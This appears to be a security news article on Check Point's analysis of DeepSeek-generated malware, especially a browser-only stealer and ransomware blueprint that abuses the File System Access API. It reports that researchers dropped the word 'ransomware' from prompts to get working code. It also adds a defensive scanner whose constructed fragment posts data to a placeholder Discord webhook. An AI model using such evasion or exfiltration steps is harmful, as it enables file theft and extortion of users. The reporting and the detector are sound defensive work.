Over the past year Check Point Research tracked almost 3,000 files attributed to the DeepSeek model and classified nearly half — 1,383 files — as malicious or dangerous based on VirusTotal results or static source analysis.
What Check Point found in the DeepSeek dataset
Check Point's threat hunters examined a corpus of DeepSeek-generated files and identified a subset they describe as malicious or dangerous. Researcher Alexey Bukhteyev wrote, “Within this dataset, we found a sample that implemented a dangerous browser-native technique we have not observed exploited in the wild.” Using VirusTotal and static analysis, the team flagged 1,383 of the roughly 3,000 files as malicious or dangerous.
The investigative work surfaced a single Python Flask application the researchers named InfernoGrabber 9000. VirusTotal labelled that sample a “fully functional information stealer and ransomware toolkit.” Although the sample was incomplete and could not execute a real-world infection as provided, Check Point judged that minimal additional effort would be required to turn it into a functioning attack.
InfernoGrabber 9000: an AI-generated blueprint for browser-native theft and encryption
The InfernoGrabber 9000 sample is written as a web application that targets Android users and presents a lure disguised as a Discord avatar AI upscaler. The code assembled by the model included routines and stubs mapped to familiar native-malware behaviors: keystroke logging, clipboard monitoring, form and network-request interception, Discord-token collection, crypto-wallet and payment-card discovery, geolocation requests, webcam and microphone access, screenshots, and local-file access.
Bukhteyev cautioned that the sample did not actually implement all of these features in a working form, calling it “an AI-generated blueprint in which the model tried to translate familiar capabilities of native stealers and ransomware tools into a web page opened in the browser.” Nonetheless, the sample contained explicit exploitation stubs — including references to CVE-2023-4863 — used a hardcoded Discord webhook for exfiltration, and included a ransomware WinLocker-style overlay demanding Bitcoin.
File System Access API and a browser-native attack surface
The technique leverages a known browser capability: the File System Access API, which allows web applications to read, write, and manage local files when the user grants permission. The File System Access specification itself lists ransomware as a security consideration, and a 2023 USENIX Security paper described how that API could be abused to encrypt local files from a malicious web application. Google researchers Güliz Seray Tuncay and a team from Florida International University previously warned that the API “greatly extends the attack surface, which can be abused by adversaries to cause significant harm.”
Check Point highlights that what is new here is an LLM taking those previously documented platform risks and assembling them into a plausible phishing-style web app that requires neither a native payload, APK installation, browser exploit, nor root access — only a user click and the standard permission prompts the API exposes in Chrome and Chromium-based browsers.
From incomplete sample to working proof-of-concept
Although the original InfernoGrabber 9000 sample did not succeed in a live infection, Check Point researchers used the latest DeepSeek model V4 to produce a working proof-of-concept demonstrating how a browser page can request access to local files, process them inside the browser, and leave the user unable to recover original content — effectively a browser-only ransomware scenario.
Pedro Drimel Neto, malware analysis team leader at Check Point Research, told The Register that turning the incomplete sample into a fully functional attack required “very little effort.” Neto added that low-level expertise is sufficient to operationalize the technique and that Check Point has already observed “evidence of actual threat actors attempting this attack using straightforward LLM prompts.” The team reported having to remove explicit terms like “ransomware” from prompts during their testing to obtain working code, but the resulting functionality matched the intended outcome.
Check Point also warned that the obfuscation techniques used in these kinds of attacks make them difficult to detect, and Neto noted an uptick in ransomware aimed at end users, whereas traditional ransomware groups have historically targeted enterprises and critical infrastructure.
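For defenders who want a first-pass triage of web content for the combination the article describes (File System Access API calls with write access, in-browser encryption, deletion of originals, and exfiltration to a hardcoded Discord webhook), here is an added heuristic scanner written for this piece; it is not Check Point's tooling, and the indicator names, weights, threshold and the two constructed script fragments are this example's own assumptions.

```python
import re

# Indicator name -> (regex over page/script source, weight). Assumed values
# for this example; the API names are the standard File System Access API
# and WebCrypto calls, the webhook host is the exfiltration channel the
# article mentions.
INDICATORS = {
    "fs_directory_picker": (r"showDirectoryPicker\s*\(", 2),
    "fs_readwrite_mode":   (r"mode\s*:\s*['\"]readwrite['\"]", 2),
    "fs_writable_stream":  (r"\.createWritable\s*\(", 1),
    "fs_remove_entry":     (r"\.removeEntry\s*\(", 2),
    "webcrypto_encrypt":   (r"crypto\.subtle\.encrypt\s*\(", 2),
    "discord_webhook":     (r"discord(?:app)?\.com/api/webhooks/", 3),
}
THRESHOLD = 5  # assumed; tune against your own benign corpus


def triage_web_content(source: str) -> dict:
    """Return matched indicators, a weighted score and a verdict for one page."""
    hits = {name for name, (pattern, _) in INDICATORS.items()
            if re.search(pattern, source)}
    score = sum(INDICATORS[name][1] for name in hits)
    # Hard rule: encrypting local files and deleting the originals is the
    # browser-only ransomware pattern regardless of the weighted score.
    ransom_pattern = {"webcrypto_encrypt", "fs_remove_entry"} <= hits
    verdict = "suspicious" if ransom_pattern or score >= THRESHOLD else "benign"
    return {"hits": sorted(hits), "score": score, "verdict": verdict}


# Constructed sample 1: a legitimate single-file text editor. It uses the same
# API family, so a detector must not flag write access on its own.
BENIGN_EDITOR = """
const [h] = await window.showOpenFilePicker();
const w = await h.createWritable(); await w.write(text); await w.close();
"""

# Constructed sample 2: fragments (not a working script) showing the call
# sites the article describes together on one page.
SUSPICIOUS_PAGE = """
const dir = await window.showDirectoryPicker({ mode: 'readwrite' });
/* ... per-file loop elided ... */
const enc = await crypto.subtle.encrypt(params, key, plaintextBuffer);
await dir.removeEntry(name);
fetch('https://discord.com/api/webhooks/000/PLACEHOLDER', { method: 'POST', body });
"""

if __name__ == "__main__":
    for label, src in (("editor", BENIGN_EDITOR), ("page", SUSPICIOUS_PAGE)):
        print(label, triage_web_content(src))
```

Because the article notes these samples are obfuscated, run the scanner over scripts as the browser actually executes them (for example, captured from a sandboxed browser's debugger or after de-obfuscation) rather than only over the raw download, or pattern matching of this kind will be evaded.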
What this means for technologists, end users, and threat actors
- Technologists and security teams: The combination of browser-native APIs and AI-generated attack blueprints raises monitoring and detection challenges; Check Point pointed to code obfuscation and browser-based exfiltration (for example, via hardcoded webhooks) as elements that can hide malicious behavior from conventional controls.
- End users and Android device owners: The delivered lure in the sample — a Discord avatar upscaler — underlines the social-engineering vector: a seemingly benign web app that prompts for permission and then leverages standard browser dialogs to gain access to files and devices.
- Threat actors: Check Point concluded that low technical expertise is sufficient to adapt an LLM output into a working browser-native ransomware tool; the team reported seeing evidence that attackers are experimenting with straightforward LLM prompts to attempt this technique now.
Check Point's research turns a theoretical platform risk into an executable blueprint, and the firm's researchers warned the activity is likely already happening or will appear in the short term. As the team notes, an AI-generated blueprint that maps native-malware capabilities into browser code materially lowers the bar for attackers who leverage social engineering plus legitimate browser permission dialogs to reach victims.